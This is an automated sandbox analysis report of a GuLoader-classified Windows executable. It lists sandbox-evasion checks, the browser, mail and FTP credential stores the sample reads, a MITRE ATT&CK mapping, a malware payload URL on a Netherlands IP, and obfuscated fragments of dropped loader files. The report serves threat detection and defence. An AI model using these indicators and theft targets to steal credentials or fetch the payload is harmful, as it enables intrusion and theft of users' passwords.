        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeAPI/Special instruction interceptor: Address: 67A3BA7
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeAPI/Special instruction interceptor: Address: 2FB3BA7
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeMemory allocated: 36D50000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeMemory allocated: 36BA0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405861
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_0040639C FindFirstFileA,FindClose,5_2_0040639C
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_004026F8 FindFirstFileA,5_2_004026F8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405861
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_004026F8 FindFirstFileA,9_2_004026F8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_0040639C FindFirstFileA,FindClose,9_2_0040639C
        Source: 1ppvR5VRT6.exe, 00000009.00000003.98820623011.0000000006623000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWcuT;
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeAPI call chain: ExitProcess graph end nodegraph_5-4286
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeAPI call chain: ExitProcess graph end nodegraph_5-4475
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_10001A5D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess created: C:\Users\user\Desktop\1ppvR5VRT6.exe "C:\Users\user\Desktop\1ppvR5VRT6.exe"Jump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeQueries volume information: C:\Users\user\Desktop\1ppvR5VRT6.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040330D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: Yara matchFile source: 00000009.00000002.101765393244.0000000036D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        11
        Masquerading
        2
        OS Credential Dumping
        311
        Security Software Discovery
        Remote Services1
        Email Collection
        1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        12
        Virtualization/Sandbox Evasion
        1
        Credentials in Registry
        12
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Disable or Modify Tools
        Security Account Manager1
        System Network Configuration Discovery
        SMB/Windows Admin Shares2
        Data from Local System
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Access Token Manipulation
        NTDS3
        File and Directory Discovery
        Distributed Component Object Model1
        Clipboard Data
        12
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection
        LSA Secrets126
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Deobfuscate/Decode Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        1ppvR5VRT6.exe50%ReversingLabsWin32.Trojan.GuLoader
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://185.222.58.113/0%Avira URL Cloudsafe
        http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        http://185.222.58.113/qUSTn118.bin100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        ip-api.com
        208.95.112.1
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://185.222.58.113/qUSTn118.binfalse
          • Avira URL Cloud: malware
          unknown
          http://ip-api.com/line/?fields=hostingfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_Error1ppvR5VRT6.exefalse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorError1ppvR5VRT6.exe, 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 1ppvR5VRT6.exe, 00000005.00000000.96643618239.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.222.58.113/1ppvR5VRT6.exe, 00000009.00000003.98820623011.0000000006623000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          208.95.112.1
          ip-api.comUnited States
          53334TUT-ASUStrue
          185.222.58.113
          unknownNetherlands
          51447ROOTLAYERNETNLfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1466840
          Start date and time:2024-07-03 14:00:11 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 15m 36s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:10
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:1ppvR5VRT6.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/12@1/2
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 94%
          • Number of executed functions: 137
          • Number of non-executed functions: 67
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe
          • Excluded domains from analysis (whitelisted): assets.msn.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com
          • Execution Graph export aborted for target 1ppvR5VRT6.exe, PID 9536 because it is empty
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: 1ppvR5VRT6.exe
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          208.95.112.1BUBIJ0OwLP.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          7Pqym5wyq5.exeGet hashmaliciousGuLoaderBrowse
          • ip-api.com/line/?fields=hosting
          _Account Receipt.PDF.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          Inquiry Studbolt - 240703.vbeGet hashmaliciousGuLoaderBrowse
          • ip-api.com/line/?fields=hosting
          2024.scr.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • ip-api.com/line/?fields=hosting
          AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          roger.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          185.222.58.113004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/ubsFsaZf137.bin
          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/bJibCYgZszSl185.bin
          Documents.com.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/QZxiWpS132.bin
          27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/dzPxpaYSrjQF221.bin
          Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/aZZfDlS144.bin
          e6FEkdlKCX.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.113:55615/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ip-api.comBUBIJ0OwLP.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          7Pqym5wyq5.exeGet hashmaliciousGuLoaderBrowse
          • 208.95.112.1
          _Account Receipt.PDF.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Inquiry Studbolt - 240703.vbeGet hashmaliciousGuLoaderBrowse
          • 208.95.112.1
          2024.scr.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 208.95.112.1
          AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          roger.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ROOTLAYERNETNL004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          Documents.com.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          v1JxTE3aw1.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.234
          GLslDiEqwx.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.79
          oIZhm8seZB.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.70
          FbfKnwuoXd.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.70
          7f40bfb86707faf0ec8978614840ab858320d1978bc351546833272b7b70c854_payload.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.77
          TUT-ASUSBUBIJ0OwLP.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          7Pqym5wyq5.exeGet hashmaliciousGuLoaderBrowse
          • 208.95.112.1
          _Account Receipt.PDF.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Inquiry Studbolt - 240703.vbeGet hashmaliciousGuLoaderBrowse
          • 208.95.112.1
          2024.scr.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 208.95.112.1
          AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          roger.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dllOzb8aojWew.exeGet hashmaliciousGuLoaderBrowse
            aMfizaMilo.exeGet hashmaliciousGuLoaderBrowse
              Ozb8aojWew.exeGet hashmaliciousGuLoaderBrowse
                Documents.com.exeGet hashmaliciousGuLoaderBrowse
                  Documents.com.exeGet hashmaliciousGuLoaderBrowse
                    27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
                      27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
                        Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
                          Order 000293884849900.bat.exeGet hashmaliciousGuLoaderBrowse
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):836396
                            Entropy (8bit):0.29759115823756915
                            Encrypted:false
                            SSDEEP:768:ONjfRwbxYsn1KxrM/MRos6Yumut+ud9j4f7lzZnMkviwCdR/S9krIXLtZkCoVf/1:Q/5y
                            MD5:6593DE223564535CE11D13BFB74348CA
                            SHA1:5D85AF6A3877470118DDAC318A131C7EB2498BB2
                            SHA-256:A57CB464F48B61E87ED20832F2D6EAE93C2669BB13850CB6186248E9B597364C
                            SHA-512:F0B85A3F75268CB4B08FF7FC18A631ACC4C1D9E8ACA804B9ED8DFC186789BF930467F1C2AE2DCC769AC200557D4FF01ABDA80EA17CE622488D56C264D2941E3F
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:..................................................................................................................................?......................................................................................................................................................................................................................................................................................................................................................................................................................................e.......................................................................................................................................................................................................k...................................................S.......................................................................................................................X..........................................................................
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):245207
                            Entropy (8bit):7.5004205547744585
                            Encrypted:false
                            SSDEEP:6144:tV0Q8Z25kI+0ixDrnlFPo+7/nUqVb+OUGo4RTvI:tGQW25eZJDzVbfBg
                            MD5:AD0F0ECE9B3EB9F8A85445C0A5C0321B
                            SHA1:0BDEE84F313E45C60D9BB50C3BE5A004709DFA72
                            SHA-256:557CE9743F53AA74241E6D3147D14F1D3CDC4C5F1043621DB145663D8471E043
                            SHA-512:D25B267FF6C551BA1DFC35E38506C43A0BFAF7350F3D2D3AF5A0E75D803AC5364147FBC4B9645FAF15B63F61BEB8C778D50651746B9F18BAB3140EDDEE269BD4
                            Malicious:false
                            Reputation:low
                            Preview:..................5.......00000..yy.<<...................~~~.H...ff........^.5...................WWWW......||||....."....l............=....]..GGG.....................YYY...............n..LL.uuu...a............./......p..####...................''.)))).............dd..............................i..........2222........{..........**.....\\\....ggg...****.hhh..b..........PP..>>..................+.c.........R.]......`.....................k......eeeeeee.111...............~~.A...................".........mmm.III.=.;....'......''''...............LL..........&&&.bb....................MMMM..g..w.........222...........-........,,...............$....`.......".........................................z..b...m.wwwww.::.V....%%.y.........................--......UUU.a.==...............s....--..........................................1....vv................555.............>>..."""....Z.........z...............K..''.........--.............##.w..::...oo.YY...8.LL....B..............(((.kkk............N....
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6218
                            Entropy (8bit):4.450693657153253
                            Encrypted:false
                            SSDEEP:96:MmrEQEHCsEZAxZP0FBbsW29vaAyvK7ZviCI5p:RpEH9f0boNlyveZviCI5p
                            MD5:1E7DC4D79053F5FFA0CFF28A1B44241F
                            SHA1:E9E8671AA0DFFAC33B30018BDE9A434D1D75EF56
                            SHA-256:B6AD78B6014239D0845577855808B3DE9BA5B42F5D267892C921CF4E293FADF1
                            SHA-512:94B10A301A746BB25A4E142B70AE4833D4B46C6E07697DDCF2CF3A17C1AB3E0EA1CB962FE2A113E2B37C7D4475710293482614E828082EC323504AA22C2BD0B2
                            Malicious:false
                            Reputation:low
                            Preview:............................................B..............""..VVV.......""..m.................k...e...r...n...e...l.NN3...2.^^:...:..jC...r..:e..Va...t...e...F...i..cl...e...A...(...m... ...r...4..{ ...,... ...i... ...0...x...8..&0.ww0...0...0...0...0...0..*,... ...i... ...0...,... .zzp... ...0...,... ...i... ...4...,... ...i... ...0...x...8...0...,... ...i... ...0...)...i.......r...8...q...k...e...r...n...e...l...3.n.2...:...:.iiS..$e..Qt.S.F...i../l.HHe..<P..Wo...i...n...t..xe.G.r...(...i... ...r...8...,..n ...i... ..d2...3...0...1...2... ...,..t ...i.x. ...0...,...i... .ll0...)...i.......r...4..Tq.."k.I.e...r.iin...e...l...3...2.=.:...:...V.KKi...r..,t...u...a...l...A...l..Wl...o...c..t(...i... ...0...,...i..{ ...8...1.||9..y6...0..N9...6...0...,... ...i... ...0..sx...3...0...0...0..2,... ...i... ...0...x.M.4...0...)...p.7.....r...2...q...k...e...r...n.$.e...l.1.3...2...:...:...R...e...a.6.d...F..<i...l...e...(.33i... .. r...8...,..: ...i... ...r...2...,... ...i... ...8...1...9.1.6
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1089926
                            Entropy (8bit):0.29789121998864304
                            Encrypted:false
                            SSDEEP:768:DfIbQMnX/cgMWndUtQ//KuGQ+4xRoQoezjVn20Ka17J6T0vbXHtPSeySgSJSejnK:VIbm
                            MD5:7978BF27082616FAADE55B22394BBDDC
                            SHA1:3CB41F03B1CD775F7F6BC9B95944854DDA87BF36
                            SHA-256:B88A13EB0EEDB9BE6E1F809D0B8A55979186DB208858FEDCE5A59B28556B248B
                            SHA-512:9A734B8285C96706C434AEDF2ABF6666E82EC257DEFAB74213C50B18A5C7B23B3A48D76FE64E4CC6446CC460095CEA3F37D8029FA28B9198F4A371BA1C23922B
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:............................................................................................................................................................................................................................................................................................................................................O................................................................................................................../.....................................................................................M............................................................................................................................................................................................................................................................................................................0.....................................................................................................................................................................
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1078378
                            Entropy (8bit):0.29937849286877016
                            Encrypted:false
                            SSDEEP:768:N9lotXK6U6HA/zmsIxzvraRwfj+iMbmwrhg2hnwjYBm2GOP9bsWZafCJL6Ir7wxG:QRPMLzJ
                            MD5:87A3CE82A211E6022D7145C99EEF5EDC
                            SHA1:D2AA5DAEF3272ACDEE40657353EBB0BA94728E8D
                            SHA-256:66BF6C84307739696EB18D632B6A34755375E61F3C612DC273C7F8F25FCAD938
                            SHA-512:66F2BC1530F6D187749486C7305F069D67964EF5427A6A59F2DC081469F5D608C6E0D2C30EDEF70A6A79E6386BE1528AE2B8725BA704E2D3CF8B2F303D8EB1CF
                            Malicious:false
                            Preview:..................................................................................{.................................................................................................................................................................v...................................................................................................................................................<..................................................................................................................................................................................................s...............................................................................................................................................................................Y.......................................................................h..........................E..........................................................f..............................................................................
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):442
                            Entropy (8bit):4.257547597458778
                            Encrypted:false
                            SSDEEP:12:cITDesyfMA34EmHSFoYHGzqDcnuV/HGgPF7Rl6s:LoMhcozqDV/HzPF+s
                            MD5:87308607BBEFDD32639F5BCAD963B8C2
                            SHA1:14A3196B8301243120BD7F9248C5949D718B4DEA
                            SHA-256:A71BD44CA8EFDA96BA1083D1D36FC2148592CA881CFF674C71B7742A1866B012
                            SHA-512:9019036C6976F9A8BA0F6D5FDE538FFA69C537A320CF09758E2CEB9012F4C106E4D09B15248CA0A695DC7960FFBBF500FF21BD3A17EBD37FE3DE13A0BBC8EA5E
                            Malicious:false
                            Preview:douceurs aflggere dryfarmer telefonvagts barytosulphate unovertaken ligustres snydeblusens foersteaarsstuderende konserverendes..foresleeve tricks datastyret diadermic.statsforfatningsretten drfljenes lavritz resurged isodrosotherm redocked ekkoer.dvblind prstevikariaternes infeminine lvs dannebrogsordenens,atocia gummaking paaligningernes visard longueurs overklasselg afviste..gydningen svovlsures pillmaking treasonous jibhead sphygmoid,
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1196385
                            Entropy (8bit):0.29404357461455993
                            Encrypted:false
                            SSDEEP:768:zrTEDgAwUGxcEEBSF2XVHcg/62u6BEqlktC9le+FplzUtaPQVPKtoQFrqFrepOde:TM2gnM9
                            MD5:11825DAB7ECEA24188448D6DE7D605A5
                            SHA1:90CC6EEC53823CDB2E1946583042699B42C84BFF
                            SHA-256:E9F3CA77C307A76C115171B367B540D2615F30636A16EE986C852AEF5EAB6409
                            SHA-512:6F0F808DE0DADD0F8E94DF72E1A85828F0BD8E14FB8F4300614901A17C260AF55CFE33EC473FEF34663E8B069BF19306EB32D38E39E60149BD85D83D14C23749
                            Malicious:false
                            Preview:.................................g...............................................................................................................................................................................................w..................................................................................0..........................................................................................................................................................................n......................................................?....................................................................................................................................................................................................................................................................................................................................................................................................................................................|..........._................
                            Process:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):714538
                            Entropy (8bit):0.297157822096001
                            Encrypted:false
                            SSDEEP:768:eLtWEAnNzz6fiBH4r4D2EBct2GaDNHpDe9SM1hon+wFniYgoZhgBy9:Q
                            MD5:17DF408E712C3359E4B58F95E4529F16
